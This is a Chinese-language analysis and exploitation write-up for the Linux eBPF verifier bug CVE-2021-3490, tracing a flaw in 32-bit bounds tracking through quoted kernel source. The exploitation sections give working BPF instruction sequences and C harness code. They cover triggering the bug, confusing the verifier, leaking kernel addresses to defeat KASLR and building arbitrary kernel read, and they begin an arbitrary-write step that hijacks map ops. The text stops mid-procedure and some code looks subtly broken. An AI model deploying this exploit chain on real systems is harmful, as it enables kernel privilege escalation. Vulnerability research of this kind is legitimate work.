eBPF漏洞CVE-2021-3490分析与利用

漏洞分析

​ verifier为了跟踪每一个寄存器的边界值(防止越界读写),会对寄存器的每一次运算模拟求解边界值(最大/最小值),由于寄存器是64bits,但是实际参与运算可能是32bits,因此实际会对32/64都进行边界校验,由adjust_scalar_min_max_valsadjust_reg_min_max_vals函数完成

/* WARNING: This function does calculations on 64-bit values, but the actual
 * execution may occur on 32-bit values. Therefore, things like bitshifts
 * need extra checks in the 32-bit case.
 */
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
                      struct bpf_insn *insn,
                      struct bpf_reg_state *dst_reg,
                      struct bpf_reg_state src_reg)
{
    struct bpf_reg_state *regs = cur_regs(env);
    u8 opcode = BPF_OP(insn->code);
    ...
    switch (opcode) {
    case BPF_ADD:
        ret = sanitize_val_alu(env, insn);
        if (ret < 0) {
            verbose(env, "R%d tried to add from different pointers or scalars\n", dst);
            return ret;
        }
        scalar32_min_max_add(dst_reg, &src_reg);
        scalar_min_max_add(dst_reg, &src_reg);
        dst_reg->var_off = tnum_add(dst_reg->var_off, src_reg.var_off);
        break;
    case BPF_SUB:
        ret = sanitize_val_alu(env, insn);
        if (ret < 0) {
            verbose(env, "R%d tried to sub from different pointers or scalars\n", dst);
            return ret;
        }
        scalar32_min_max_sub(dst_reg, &src_reg);
        scalar_min_max_sub(dst_reg, &src_reg);
        dst_reg->var_off = tnum_sub(dst_reg->var_off, src_reg.var_off);
        break;
    case BPF_MUL:
        dst_reg->var_off = tnum_mul(dst_reg->var_off, src_reg.var_off);
        scalar32_min_max_mul(dst_reg, &src_reg);
        scalar_min_max_mul(dst_reg, &src_reg);
        break;
    case BPF_AND:
        dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off);
        scalar32_min_max_and(dst_reg, &src_reg);
        scalar_min_max_and(dst_reg, &src_reg);
        break;
    case BPF_OR:
        dst_reg->var_off = tnum_or(dst_reg->var_off, src_reg.var_off);
        scalar32_min_max_or(dst_reg, &src_reg);
        scalar_min_max_or(dst_reg, &src_reg);
        break;
    case BPF_LSH:
        if (umax_val >= insn_bitness) {
            /* Shifts greater than 31 or 63 are undefined.
             * This includes shifts by a negative number.
             */
            mark_reg_unknown(env, regs, insn->dst_reg);
            break;
        }
        if (alu32)
            scalar32_min_max_lsh(dst_reg, &src_reg);
        else
            scalar_min_max_lsh(dst_reg, &src_reg);
        break;
    case BPF_RSH:
        if (umax_val >= insn_bitness) {
            /* Shifts greater than 31 or 63 are undefined.
             * This includes shifts by a negative number.
             */
            mark_reg_unknown(env, regs, insn->dst_reg);
            break;
        }
        if (alu32)
            scalar32_min_max_rsh(dst_reg, &src_reg);
        else
            scalar_min_max_rsh(dst_reg, &src_reg);
        break;
    case BPF_ARSH:
        if (umax_val >= insn_bitness) {
            /* Shifts greater than 31 or 63 are undefined.
             * This includes shifts by a negative number.
             */
            mark_reg_unknown(env, regs, insn->dst_reg);
            break;
        }
        if (alu32)
            scalar32_min_max_arsh(dst_reg, &src_reg);
        else
            scalar_min_max_arsh(dst_reg, &src_reg);
        break;
    default:
        mark_reg_unknown(env, regs, insn->dst_reg);
        break;
    }

    /* ALU32 ops are zero extended into 64bit register */
    if (alu32)
        zext_32_to_64(dst_reg);

    __update_reg_bounds(dst_reg);
    __reg_deduce_bounds(dst_reg);
    __reg_bound_offset(dst_reg);
    return 0;
}

漏洞就出现在32bit的BPF_AND/BPF_OR/BPF_XOR运算上

static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
                 struct bpf_reg_state *src_reg)
{
    bool src_known = tnum_subreg_is_const(src_reg->var_off);
    bool dst_known = tnum_subreg_is_const(dst_reg->var_off);
    struct tnum var32_off = tnum_subreg(dst_reg->var_off);
    s32 smin_val = src_reg->s32_min_value;
    u32 umax_val = src_reg->u32_max_value;

    /* Assuming scalar64_min_max_and will be called so its safe
     * to skip updating register for known 32-bit case.
     */
    if (src_known && dst_known)
        return;
    ...
}

上面的代码说明当32bit 源寄存器和目的寄存器的值都是known的时候,就不更新32bit的边界值。注释说明在这种情况下scalar64_min_max_and会处理。

static void scalar_min_max_and(struct bpf_reg_state *dst_reg,
                   struct bpf_reg_state *src_reg)
{
    bool src_known = tnum_is_const(src_reg->var_off);
    bool dst_known = tnum_is_const(dst_reg->var_off);
    s64 smin_val = src_reg->smin_value;
    u64 umax_val = src_reg->umax_value;

    if (src_known && dst_known) {
        __mark_reg_known(dst_reg, dst_reg->var_off.value &
                      src_reg->var_off.value);
        return;
    }
    ...
}

在64bit边界值校验中,在源和目的寄存器都是known的情况下,会调用__mark_reg_known函数。

但是这里有一个区别

  • 在scalar32_min_max_and中用的tnum_subreg_is_const校验寄存器的低32位是否是known;
  • 在scalar_min_max_and中用的tnum_is_const校验寄存器的64位是否是known

这里就有一个例外的情况,即一个reg的低32位是known,高32位是unknown。在这种情况下,__mark_reg32_known函数没有被调用,该函数会将寄存器的低32位设置为常数。

static void __mark_reg32_known(struct bpf_reg_state *reg, u64 imm)
{
    reg->var_off = tnum_const_subreg(reg->var_off, imm);
    reg->s32_min_value = (s32)imm;
    reg->s32_max_value = (s32)imm;
    reg->u32_min_value = (u32)imm;
    reg->u32_max_value = (u32)imm;
}

在adjust_scalar_min_max_vals函数返回前,调用了下面三个函数更新寄存器的边界值

__update_reg_bounds(dst_reg);
    __reg_deduce_bounds(dst_reg);
    __reg_bound_offset(dst_reg);
    return 0;

它们都有32/64两种实现,漏洞出现在32的实现中,我们只关注这一部分。

__update_reg32_bounds函数根据reg.var_off计算边界值

  • 最小值:当前寄存器的最小值/已知的常数值(known)
  • 最大值:当前寄存器的最大值/已知的常数值(known)
static void __update_reg32_bounds(struct bpf_reg_state *reg)
{
    struct tnum var32_off = tnum_subreg(reg->var_off);

    /* min signed is max(sign bit) | min(other bits) */
    reg->s32_min_value = max_t(s32, reg->s32_min_value,
            var32_off.value | (var32_off.mask & S32_MIN));
    /* max signed is min(sign bit) | max(other bits) */
    reg->s32_max_value = min_t(s32, reg->s32_max_value,
            var32_off.value | (var32_off.mask & S32_MAX));
    reg->u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value);
    reg->u32_max_value = min(reg->u32_max_value,
                 (u32)(var32_off.value | var32_off.mask));
}

使用signed的最大/小值订正unsigned的边界值;反之也可以

/* Uses signed min/max values to inform unsigned, and vice-versa */
static void __reg32_deduce_bounds(struct bpf_reg_state *reg)
{
    /* Learn sign from signed bounds.
     * If we cannot cross the sign boundary, then signed and unsigned bounds
     * are the same, so combine.  This works even in the negative case, e.g.
     * -3 s<= x s<= -1 implies 0xf...fd u<= x u<= 0xf...ff.
     */
    if (reg->s32_min_value >= 0 || reg->s32_max_value < 0) {
        reg->s32_min_value = reg->u32_min_value =
            max_t(u32, reg->s32_min_value, reg->u32_min_value);
        reg->s32_max_value = reg->u32_max_value =
            min_t(u32, reg->s32_max_value, reg->u32_max_value);
        return;
    }
    /* Learn sign from unsigned bounds.  Signed bounds cross the sign
     * boundary, so we must be careful.
     */
    if ((s32)reg->u32_max_value >= 0) {
        /* Positive.  We can't learn anything from the smin, but smax
         * is positive, hence safe.
         */
        reg->s32_min_value = reg->u32_min_value;
        reg->s32_max_value = reg->u32_max_value =
            min_t(u32, reg->s32_max_value, reg->u32_max_value);
    } else if ((s32)reg->u32_min_value < 0) {
        /* Negative.  We can't learn anything from the smax, but smin
         * is negative, hence safe.
         */
        reg->s32_min_value = reg->u32_min_value =
            max_t(u32, reg->s32_min_value, reg->u32_min_value);
        reg->s32_max_value = reg->u32_max_value;
    }
}

最后,调用__reg_bound_offset更新var_off

/* Attempts to improve var_off based on unsigned min/max information */
static void __reg_bound_offset(struct bpf_reg_state *reg)
{
    struct tnum var64_off = tnum_intersect(reg->var_off,
                           tnum_range(reg->umin_value,
                              reg->umax_value));
    struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off),
                        tnum_range(reg->u32_min_value,
                               reg->u32_max_value));

    reg->var_off = tnum_or(tnum_clear_subreg(var64_off), var32_off);
}
  • tnum_range根据给定的[umin_value, umax_value]范围值,返回一个tnum
  • tnum_intersect将两个已知的tnum合并为1个tnum(区间合并,取交集)

这里可以举一个实例以助理解上述过程存在的问题。

R2.var_off = {mask = 0xffffffff00000000, value = 0x01}; 即低32bits是known, 高32bits unkown.
                1
R3.var_off = {mask = 0x0, value = 0x100000002}; 即整个64bits是known的,值为0x100000002;

对于BPF_AND(R2, R3)运算,R2的边界值变化如下

  • tnum_and

    u64 alpha = r2.mask | r2.value = 0xffffffff00000001
    u64 beta  = r3.mask | r3.value = 0x100000002
    u64 v = r2.value & r3.value
    
    ret = TNUM(v, alpha & beta & ~v)
    ret = {mask = 0x100000000, value = 0x0}
    

    R2.var_off = {mask = 0x100000000, value = 0x0}

  • scalar32_min_max_and不会更改R2的边界值,这是因为R2和R3的低32bit都是known

  • __update_reg32_bounds

    R2.u32_min_value = R2.u32_max_value = 1;      // 进入函数前的常数值
    
    // 进入函数之后
    u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value)
                = max(1, 0) = 1;
    u32_max_value = min(reg->u32_max_value,
                   (u32)(var32_off.value | var32_off.mask));
                = min(1, 0) = 0;
    对于s32_min_value/max_value也是一样的
  • 接下来的__reg32_deduce_bounds__reg_bound_offset不会对R2的边界值产生影响

即在这种情况下我们得到的R2最小值是1,最大值是0.

这显然是不合理的,而根本原因就在于在scalar32_min_max_and函数中,没有调用__mark_reg32_known更新u/s32_min/max_value,这也是后来的fix方案

Exploitation

上述例子就是漏洞触发的路径,构造两个寄存器

R2.var_off = {mask = 0xffffffff00000000, value = 0x01}; 即低32bits是known, 高32bits unkown.
R3.var_off = {mask = 0x0, value = 0x100000002}; 即整个64bits是known的,值为0x100000002;

第二个相对更容易构造,因为所有的bit都是known的,直接可以赋值,但是由于指令的限制,我们只能用32bits运算

BPF_LD_IMM64(BPF_REG_8, 0x1);                   // r8 = 0x1
        BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32);          // r8 <= 32     == 0x10000 0000
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 2);           // r8 += 2      == 0x10000 0000 2

对于的一个,要获得mask=0xffffffff00000000,可以是先得到一个对于verifier看来完全是unknown的值,此时的mask= 0xffffffffffffffff;最直接的方法就是从map中取一个值。并且这种方法允许我们在运行时控制map的实际值,便于利用。

// Load a pointer to map_fd map info R9 R1
        BPF_LD_MAP_FD(BPF_REG_9, mapfd);
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_9);            // r1 = mapfd

        // R2=stack_ptr - 4
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10);
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4);

        //Store the value 0 at stack_ptr - 4
        BPF_ST_MEM(BPF_W, BPF_REG_10, -4, 0);           // r2 =  stack_ptr - 4; *r2 = 0

        // Call helper function map_lookup_elem, First parameter is in R1 // (map pointer). Second parameter is in R2, (ptr to elem index   // value).  *(word*)(stack_ptr-4) = 0)
        BPF_RAW_INSN(BPF_JNE | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem);

调用map_lookup_elem(mapfd, 0),将得到mapfd第一个elem,返回值在R0中。

BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_0, 0);

上述过程可以封装为一个BPF_MAP_GET(获取mapfd的指定elem)

#define BPF_MAP_GET(idx, dst)                                                \
    BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),                                     \
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),                                \
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),                               \
        BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),                              \
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),                               \
        BPF_EXIT_INSN(),                                                     \
        BPF_LDX_MEM(BPF_DW, dst, BPF_REG_0, 0),                              \
        BPF_MOV64_IMM(BPF_REG_0, 0)

由于BPF_REG_5来自map,完全由用户态控制,对于veifier,它是完全unknown的,即{mask=0xffffffffffffffff, value=0x0};接下来我们需要将其低32bit设为known,可以and一个已知的常数值0xffffffff000000来构造。

BPF_MAP_GET(0, BPF_REG_5);                      // r5 = map.elem[0]
        BPF_MOV64_REG(BPF_REG_6, BPF_REG_5);            // r6 = r5

        BPF_MOV64_IMM(BPF_REG_2, 0xffffffff);           // r2 = 0xffffffff
        BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32);          // r2 <= 32     == 0xffffffff 00000000
        BPF_ALU64_IMM(BPF_AND, BPF_REG_6, BPF_REG_2);   // r6 &= r2   ; high32 unkown, low 32 known

        BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 0x1);         // r6.var_off = {mask=0xffffffff 00000000, value=0x01}

通过上述构造的两个寄存器的AND运算即可触发漏洞

//  Trigger the vuln
        BPF_ALU64_IMM(BPF_AND, BPF_REG_6, BPF_REG_8);       // r6 &= r8;    r6.umin_value=0x1; r6.umax_value=0x0

此时r6低32位的真实值是0x2 & 0x1 == 0x0

Path confusion

​ verfier在模拟执行bpf code时,遇到有条件分支,为了避免分支爆炸问题,会尝试根据寄存器的边界值,判断该条件分支是否只会走唯一的一条路径。

例如

BPF_JMP32_IMM(BPF_JGE, BPF_REG_6, 1, 5);

表示,如果BPF_REG_6的低32bit值大于等于1,将跳过接下来的5条指令。

对于JMP32,将由is_branch32_taken函数判断是否只有一条分支可走,其余分支可以抛弃。

static int is_branch32_taken(struct bpf_reg_state *reg, u32 val, u8 opcode)
{
    struct tnum subreg = tnum_subreg(reg->var_off);
    s32 sval = (s32)val;

    switch (opcode) {
    ....
    case BPF_JGE:
        if (reg->u32_min_value >= val)
            return 1;
        else if (reg->u32_max_value < val)
            return 0;
        break;
    ...
    case BPF_JLE:
        if (reg->u32_max_value <= val)
            return 1;
        else if (reg->u32_min_value > val)
            return 0;
        break;
    ...
    }
    return -1;
}

对于JGE,这里判断如果最小值已经满足条件(大于等于给定的比较值)后,就会返回TRUE;而不会去判断最大值的合法性。同样的对于BPF_JLE,先判断最大值是否满足条件(小于等于给定值);

配合上述构造的umin_value > umax_value的情况,此时永远会返回TRUE,但是在实际运行中,R6=0, 会运行到FALSE;造成路径的混淆。

这也就意味着理论上,我们可以将任意危险的代码藏在FALSE分支实现,veifier不会对其安全性校验。

但是,事实上,verifier对于它认为永远不可达的代码(dead code)做了patch处理

static void sanitize_dead_code(struct bpf_verifier_env *env)
{
    struct bpf_insn_aux_data *aux_data = env->insn_aux_data;
    struct bpf_insn trap = BPF_JMP_IMM(BPF_JA, 0, 0, -1);
    struct bpf_insn *insn = env->prog->insnsi;
    const int insn_cnt = env->prog->len;
    int i;

    for (i = 0; i < insn_cnt; i++) {
        if (aux_data[i].seen)
            continue;
        memcpy(insn + i, &trap, sizeof(trap));
        aux_data[i].zext_dst = false;
    }
}

这里的patch方案就是将所有dead code修改为JMP - 1,这就意味着一旦执行到dead code,将回退到条件分支代码,这就形成了一个无止境的循环。

它之所以不会通过常见的nop方案去patch,是担心这些dead code位于程序尾,程序有可能越界执行。

不通过触发Exception的方式去处理,是因为subprog也可以定位到这些dead code

Info Leak

在verifier中会跟踪寄存器的状态,并且不允许将PTR的寄存器存储在map里或者作为返回值,防止泄露内核地址。

adjust_ptr_min_max_vals函数跟踪指针运算的边界

/* Handles arithmetic on a pointer and a scalar: computes new min/max and var_off.
 * Caller should also handle BPF_MOV case separately.
 * If we return -EACCES, caller may want to try again treating pointer as a
 * scalar.  So we only emit a diagnostic if !env->allow_ptr_leaks.
 */
static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
                   struct bpf_insn *insn,
                   const struct bpf_reg_state *ptr_reg,
                   const struct bpf_reg_state *off_reg)
{
    struct bpf_verifier_state *vstate = env->cur_state;
    struct bpf_func_state *state = vstate->frame[vstate->curframe];
    struct bpf_reg_state *regs = state->regs, *dst_reg;
    bool known = tnum_is_const(off_reg->var_off);
    s64 smin_val = off_reg->smin_value, smax_val = off_reg->smax_value,
        smin_ptr = ptr_reg->smin_value, smax_ptr = ptr_reg->smax_value;
    u64 umin_val = off_reg->umin_value, umax_val = off_reg->umax_value,
        umin_ptr = ptr_reg->umin_value, umax_ptr = ptr_reg->umax_value;
    struct bpf_sanitize_info info = {};
    u8 opcode = BPF_OP(insn->code);
    u32 dst = insn->dst_reg;
    int ret;

    dst_reg = &regs[dst];

    if ((known && (smin_val != smax_val || umin_val != umax_val)) ||
        smin_val > smax_val || umin_val > umax_val) {
        /* Taint dst register if offset had invalid bounds derived from
         * e.g. dead branches.
         */
        __mark_reg_unknown(env, dst_reg);
        return 0;
    }

    ....
}

这里的dst_reg就是指针寄存器,off_reg是参与运算的scalar寄存器;

有一种特殊情况,即当off_reg是一个常量且,off_reg.umin_val > off_reg.umax_val时,dst_reg会被标记为unknown,即scalar寄存器。即此时verifier不再认为dst_reg是一个指针类型,将运行存于map里,结合上述的不合理情况的存在,可以造成泄漏内核地址信息。

而通过前面构造的两个寄存器,我们可以成功得到满足这个条件的寄存器。

接下来,为了获取kernel 任意地址读写能力,我们需要获取一个原语,它能满足这种条件,即veifier认为它的值为0,但实际运行时为1。

首先,对R6加1,相应的边界值都加1

BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1);// r6 += 1; .umin_value=0x2; umax_value=0x1;

之后,一样的方法获取一个对于veifier是unknown的值(来自map),再通过JMP32更新其边界值

BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1),           // r6 += 1; .umin_value=0x2; umax_value=0x1;
        BPF_JMP32_IMM(JMP_JLE, BPF_REG_5, 1, 1),        // if r5 <= 1 goto pc+1; 
            BPF_EXIT_INSN(),

由于运行时,R5的值来自map.elem[0],可控的,当R5=0时,JLE返回TRUE,将会跳过EXIT指令,并更新R5的边界为R5.var_off = {mask=0xffffffff00000001, value=0x0}。R5.umin_value = 0, umax_value = 0x1;

当R6和R5相加时,边界值再一次更新

BPF_ALU64_REG(BPF_ADD, BPF_REG_6, BPF_REG_5),
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
                      struct bpf_insn *insn,
                      struct bpf_reg_state *dst_reg,
                      struct bpf_reg_state src_reg)
{
    struct bpf_reg_state *regs = cur_regs(env);
    u8 opcode = BPF_OP(insn->code);
    ...
    switch (opcode) {
    case BPF_ADD:
        scalar32_min_max_add(dst_reg, &src_reg);
        scalar_min_max_add(dst_reg, &src_reg);
        dst_reg->var_off = tnum_add(dst_reg->var_off, src_reg.var_off);
        break;
    ....
}

static void scalar32_min_max_add(struct bpf_reg_state *dst_reg,
                 struct bpf_reg_state *src_reg)
{
    ....
        if (dst_reg->u32_min_value + umin_val < umin_val ||
            dst_reg->u32_max_value + umax_val < umax_val) {
            dst_reg->u32_min_value = 0;
            dst_reg->u32_max_value = U32_MAX;
        }
        else {
        dst_reg->u32_min_value += umin_val;
        dst_reg->u32_max_value += umax_val;
    }
}

可以看到,在不会产生溢出的情况下,umin/umax_value只是dst和source相应的和。

也就是此时的R6.umin_value=umax_value = 0x2,此时verify 认为R6=0x2;runtime下R6=0x1

之后,利用0x2 & 0x1 == 0x0,构造出verify: 0x0, runtime: 0x1的情况

BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 1)        // verify: 0  runtime: 1

后续可以利用这一点完成越界读写。

泄漏内核地址

map里的内容并不是存储在动态分配的堆内存中,而是在bpf_array.value,而同在bpf_array中,存在一个有用的结构体bpf_map

struct bpf_array {
    struct bpf_map map;
    u32 elem_size;
    u32 index_mask;
    struct bpf_array_aux *aux;
    union {
        char value[0] __aligned(8);             // map's content
        void *ptrs[0] __aligned(8);
        void __percpu *pptrs[0] __aligned(8);
    };
};

struct bpf_map {
    /* The first two cachelines with read-mostly members of which some
     * are also accessed in fast-path (e.g. ops, max_entries).
     */
    const struct bpf_map_ops *ops ____cacheline_aligned;
    struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
    void *security;
#endif
    enum bpf_map_type map_type;
    u32 key_size;
    u32 value_size;
    u32 max_entries;
    u64 map_extra; /* any per-map-type extra fields */
    u32 map_flags;
    int spin_lock_off; /* >=0 valid offset, <0 error */
    int timer_off; /* >=0 valid offset, <0 error */
    u32 id;
    int numa_node;
    u32 btf_key_type_id;
    u32 btf_value_type_id;
    u32 btf_vmlinux_value_type_id;
    struct btf *btf;
    ...
};

其中最重要的一个成员就是ops,它指向了一个虚拟函数表,取决于map的类型。

例如有array_map_ops/cpu_map_ops/dev_map_ops...,这些结构体都位于.rodata,并且在/proc/kallsyms中有对应的导出符号,泄漏这些地址可以用于绕过KALSR.

map_lookup_elem我们可以获取任意一个map里elem的地址即bpf_array.value的地址,通过偏移计算(&value[0] - 0x110)可以得到ops地址。

下述代码可以将ops地址存储在map.elem[4]中

struct bpf_insn prog[] = {

        BPF_LD_MAP_FD(BPF_REG_9, mapfd),

        // {mask=0x0, value=0x1000000002}
        BPF_LD_IMM64(BPF_REG_8, 0x1),                   // r8 = 0x1
        BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32),          // r8 <= 32     == 0x10000 0000
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 2),           // r8 += 2      == 0x10000 0000 2

        BPF_MAP_GET(0, BPF_REG_5),                      // r5 = map.elem[0]
        BPF_MOV64_REG(BPF_REG_6, BPF_REG_5),            // r6 = r5

        BPF_MOV64_IMM(BPF_REG_2, 0xffffffff),           // r2 = 0xffffffff
        BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32),          // r2 <= 32     == 0xffffffff 00000000
        BPF_ALU64_IMM(BPF_AND, BPF_REG_6, BPF_REG_2),   // r6 &= r2   ; high32 unkown, low 32 known

        BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 0x1),         // r6.var_off = {mask=0xffffffff 00000000, value=0x01}

        //  Trigger the vuln
        BPF_ALU64_IMM(BPF_AND, BPF_REG_6, BPF_REG_8),       // r6 &= r8;    r6.umin_value=0x1; r6.umax_value=0x0

        BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1),           // r6 += 1; .umin_value=0x2; umax_value=0x1;
        BPF_JMP32_IMM(BPF_JLE, BPF_REG_5, 1, 1),        // if r5 <= 1 goto pc+1; 
            BPF_EXIT_INSN(),                            // r5.umin_value = 0x0, umax_value=0x1
            BPF_ALU64_REG(BPF_ADD, BPF_REG_6, BPF_REG_5), // r6 +=r5 umin_value=umax_value=0x2
            // only take low 32 bits
            BPF_MOV32_REG(BPF_REG_6, BPF_REG_6),        // r6=r6    ; only low 32bits
            BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 1),       // verify: 0  runtime: 1

        // read kalsr(op=0) ops地址在&value[0] - 0x110处
        BPF_MAP_GET(1, BPF_REG_7),                      // 30: (79) r7 = *(u64 *)(r0 +0)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 0, 23),         // 32: (55) if r7 != 0x0 goto pc+23
        BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110),       // 33: (27) r6 *= 272
        BPF_MAP_GET_ADDR(0, BPF_REG_7),                 // 41: (bf) r7 =map_value(id=0,off=0,ks=4,vs=8,imm=0) R7=invP0 R8=invP0 R9=ma?
        BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6),   // 43: (1f) r7 -= r6
        BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0),   // 44: (79) r8 = *(u64 *)(r7 +0)
        BPF_MAP_GET_ADDR(4, BPF_REG_6),                 
        BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_8, 0),   // 54: (7b) *(u64 *)(r6 +0) = r8
        BPF_EXIT_INSN(),

    BPF_EXIT_INSN(),
    };
触发eBPF code执行

最简单的就是创建一个BPF_PROG_TYPE_SOCKET_FILTER类型的bpf_prog,这样就可以在每一次写入socket操作,就可以触发一次eBPF代码执行

// write_msg() —— trigger to execute eBPF code
int write_msg()
{
    ssize_t n = write(sockets[0], buffer, sizeof(buffer));
    if (n < 0)
    {
        perror("write");
        return 1;
    }
    if (n != sizeof(buffer))
    {
        fprintf(stderr, "short write: %d\n", n);
    }
    return 0;
}

泄漏内核地址:

// Step 1: create eBPF code, verify and trigger the vulnerability
    mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 0x100);
    if (mapfd < 0)
    {
        fail("failed to create map '%s'\n", strerror(errno));
    }
    redact("sneaking evil bpf past the verifier\n");
    int progfd = load_prog();  // verify
    printf("%s\n", bpf_log_buf);
    if (progfd < 0)
    {
        if (errno == EACCES)
        {
            msg("log:\n%s", bpf_log_buf);
        }
        printf("%s\n", bpf_log_buf);
        fail("failed to load prog '%s'\n", strerror(errno));
    }

    redact("creating socketpair()\n");
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))
    {
        fail("failed to create socket pair '%s'\n", strerror(errno));
    }

    redact("attaching bpf backdoor to socket\n");
    if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)
    {
        fail("setsockopt '%s'\n", strerror(errno));
    }

    // Step 2: leak kernel_base  (op=0)
    update_elem(0, 0);      // value[0]=0x180000000; value[1]=0;
    update_elem(1, 0);  
    size_t value = 0;
    write_msg();
    size_t ops_addr = get_elem(4);      // 读取value[4]处的值
    printf("leak addr: 0x%llx\n", ops_addr);
任意地址读

bpf_map中还有一个重要的结构体指针struct bpf* btf, 它指向一个包含调试信息的结构体,通常情况下,该指针是没有初始化的(NULL),也就提供了一个坑位,可以用于写入任意地址,并且不会对内核其他功能产生影响。

函数bpf_map_get_info_by_fd,有如下代码

if (map->btf) {
        info.btf_id = btf_obj_id(map->btf);
        info.btf_key_type_id = map->btf_key_type_id;
        info.btf_value_type_id = map->btf_value_type_id;
    }

即,当我们能越界写map->btfsomeaddr - offsetof(struct btf, id)时,info.btf_id将被写入*(someaddr),由于btf_id类型是u32,这种方式可以每次读取任意地址4bytes的内容。

修改bpf_array->bpf_map->btf(&map + 0x40)为指定地址,利用bpf_map_get_info_by_fd可以泄漏btf->id(偏移&btf + 0x58)的四字节。

//eBPF code
        // write btf (op=1)     (write bpf_array->bpf_map->btf)
        BPF_JMP_IMM(BPF_JNE,BPF_REG_7,  1, 22),         
            BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0xd0),    //
            BPF_MAP_GET_ADDR(0, BPF_REG_7),             // r7= &map.elem[0]
            BPF_ALU64_REG(BPF_SUB, BPF_REG_7,BPF_REG_6),    // r7 -= r6 
            BPF_MAP_GET(2, BPF_REG_8),                      // r8 = map.elem[2] (target_addr - 0x58)
            BPF_ST_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),     // *(u64 *)(r7 + 0) = r8
            BPF_EXIT_INSN(),

//trigger code
// abitary read 64 bytes: 利用 bpf_obj_get_info_by_fd 读取两个4字节并拼接到一起
size_t read64(size_t addr)
{
    char buf[50] = { 0 };
    uint32_t hi_32, lo_32;
    update_elem(0, 0);
    update_elem(1, 1);  //write btf
    update_elem(2, addr - 0x58);    // target addr - 0x58 (offsetof(btf, id))

    write_msg();

    if(bpf_obj_get_info_by_fd(mapfd, 0x50, buf)){
        fail("failed in bpf_obj_get_info_by_fd.");
        return 0;
    }

    // return value in bpf_map_info->btf_id (offset is 0x40)
    lo_32 = *(unsigned int*)(&buf[0x40]);

    update_elem(2, addr - 0x58 + 4);
    write_msg();
    if(bpf_obj_get_info_by_fd(mapfd, 0x50, buf)){
        fail("failed in bpf_obj_get_info_by_fd.");
        return 0;
    }
    hi_32 = *(unsigned int*)(&buf[0x40]);
    return (((size_t(hi_32) << 32)) | lo_32);
}
任意地址写

现在,我们可以利用前述漏洞获取map相关的地址信息,并可篡改相关地址(可用过map偏移获取的),例如覆写bpf_map的ops函数指针,但是却没有任意地址写。ops函数指针的第一个参数往往都是bpf_map结构,使得很多已知的函数不可用。看起来可行的就是利用bpf_map原生的函数。

其中arraymapmap_get_next_key函数如下

static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
{
    struct bpf_array *array = container_of(map, struct bpf_array, map);
    u32 index = key ? *(u32 *)key : U32_MAX;
    u32 *next = (u32 *)next_key;

    if (index >= array->map.max_entries) {
        *next = 0;
        return 0;
    }

    if (index == array->map.max_entries - 1)
        return -ENOENT;

    *next = index + 1;
    return 0;
}

index < array->map.max_entries - 1时,始终执行*next = index + 1;当map,.max_entries == 0xffffffff时,永远成立。

而当keynext_key可控时,就是一个任意地址写u32(四个字节)的途径

*(u32*)next_key = *key + 1;

ops->map_push_elem函数原型和它相兼容,且两个参数可控

int (*map_push_elem)(struct bpf_map *map, void *value, u64 flags);

如果将ops->map_push_elem函数替换为array_map_get_next_key,即可达到任意地址写。

map->push_elem的唯一调用路径来自bpf_map_update_value,且map_type为特定的类型。

else if (map->map_type == BPF_MAP_TYPE_QUEUE ||
           map->map_type == BPF_MAP_TYPE_STACK ||
           map->map_type == BPF_MAP_TYPE_BLOOM_FILTER) {
        err = map->ops->map_push_elem(map, value, flags);
    }

因此,构造任意地址写的步骤

1: 在可控expmap.value上复制一份ops 虚函数表,并替换map_push_elem为array_map_get_next_key
2: 
3: expmap->max_entries设置为0xffffffff
4:expmap->map_type 设置为 BPF_MAP_TYPE_STACK
复制ops虚函数表,并替换map_push_elem
// Step 3: replace map->ops->map_push_elem with map_get_next_key
    char fake_ops[0xe8] = { 0 };
    for(int i=0; i<0xe8; i+8){
        // make a fake ops at &value[0x10]
        *(size_t*)&ops[i] = read64(ops_addr + i);   
        update_elem(0x10 + i/8, *(size_t*)&ops[i]);
    }
